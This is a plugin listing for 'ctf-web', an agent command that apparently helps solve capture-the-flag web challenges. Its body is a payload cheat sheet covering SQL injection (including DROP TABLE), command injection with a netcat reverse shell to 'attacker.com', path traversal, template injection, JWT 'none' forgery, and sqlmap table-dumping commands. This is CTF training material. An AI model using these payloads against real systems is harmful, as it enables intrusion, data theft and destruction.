Stats
Actions
Tags
From ctf-kit
Assists in solving CTF web security challenges: reconnaissance on URLs/apps (robots.txt, source, headers), detects/exploits SQLi, command injection, path traversal, SSTI, JWT using sqlmap, gobuster, ffuf, Python requests.
How this agent operates — its isolation, permissions, and tool access model
Agent reference
ctf-kit:agents/claude/commands/ctf-webThe summary Claude sees when deciding whether to delegate to this agent
Help solve web security challenges. Use this command when: - Challenge provides a URL or web application - Challenge involves SQL injection, XSS, or other web vulns - Need to analyze web source code - Challenge mentions APIs, cookies, or sessions 1. **Check common paths** ```text /robots.txt /sitemap.xml /.git/ /admin /api /backup ``` 2. **View source** - HTML comments - JavaScript files - Hidd...
Help solve web security challenges.
Use this command when:
Check common paths
/robots.txt
/sitemap.xml
/.git/
/admin
/api
/backup
View source
Check cookies/headers
# Test for SQLi
' OR '1'='1
' OR 1=1--
" OR ""="
'; DROP TABLE users;--
# Union-based
' UNION SELECT 1,2,3--
' UNION SELECT username,password FROM users--
# Blind SQLi
' AND 1=1-- (true)
' AND 1=2-- (false)
; ls -la
| cat /etc/passwd
`whoami`
$(cat flag.txt)
; nc attacker.com 4444 -e /bin/sh
../../../etc/passwd
....//....//....//etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
# Jinja2
{{7*7}}
{{config}}
{{request.application.__globals__}}
# Twig
{{7*7}}
{{_self.env.display('id')}}
# None algorithm
import jwt
token = jwt.encode({"admin": True}, key=None, algorithm="none")
# Weak secret
# Try common passwords or brute force
# Check available tools
ctf check --category web
# SQL injection
sqlmap -u "http://target/page?id=1" --dbs
# Directory bruteforce
gobuster dir -u http://target -w wordlist.txt
ffuf -u http://target/FUZZ -w wordlist.txt
# Fuzzing
ffuf -u http://target/api/FUZZ -w params.txt -mc 200
# Web vuln scanner
nikto -h http://target
# Basic test
sqlmap -u "http://target/?id=1"
# List databases
sqlmap -u "http://target/?id=1" --dbs
# List tables
sqlmap -u "http://target/?id=1" -D dbname --tables
# Dump table
sqlmap -u "http://target/?id=1" -D dbname -T users --dump
# POST request
sqlmap -u "http://target/login" --data="user=admin&pass=test"
# With cookies
sqlmap -u "http://target/?id=1" --cookie="session=abc123"
import requests
url = "http://target/endpoint"
session = requests.Session()
# GET request
r = session.get(url, params={"id": "1"})
# POST request
r = session.post(url, data={"user": "admin", "pass": "test"})
# JSON
r = session.post(url, json={"user": "admin"})
# Custom headers
r = session.get(url, headers={"X-Custom": "value"})
# With cookies
r = session.get(url, cookies={"session": "token"})
print(r.text)
print(r.cookies)
When responding to /ctf.web:
/ctf.analyze - For analyzing provided source code/ctf.crypto - For JWT/encryption issuesnpx claudepluginhub mysterionrise/ctf-kitFetches up-to-date library and framework documentation from Context7 for questions on APIs, usage, and code examples (e.g., React, Next.js, Prisma). Returns concise summaries.
Expert in strict POSIX sh scripting for portable Unix-like systems. Delegate for shell scripts compatible with dash, ash, sh, bash --posix, featuring safe argument parsing, error handling, and cross-platform ops.
Elite code reviewer for modern AI-powered code analysis, security vulnerability detection, performance optimization, and production reliability. Masters static analysis tools and security scanning.